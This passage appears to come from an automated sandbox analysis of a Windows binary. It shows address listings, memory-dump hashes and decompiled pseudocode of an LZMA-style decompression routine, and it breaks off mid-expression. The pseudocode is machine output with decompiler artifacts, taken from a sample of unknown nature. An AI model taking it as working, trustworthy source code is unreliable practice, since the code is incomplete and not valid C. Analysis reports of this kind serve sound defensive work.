                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040676d
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x0040686f
                                                                                                        0x0040682a
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x0040681f
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x0040686f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x0040662d
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064a1
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x0040696b
                                                                                                        0x00000000
                                                                                                        0x0040696b
                                                                                                        0x004064ab
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b1
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00406762
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00000000
                                                                                                        0x004064df
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x00000000
                                                                                                        0x004069cc
                                                                                                        0x00406819
                                                                                                        0x00406899
                                                                                                        0x00406862

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                        • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                        • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                        • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
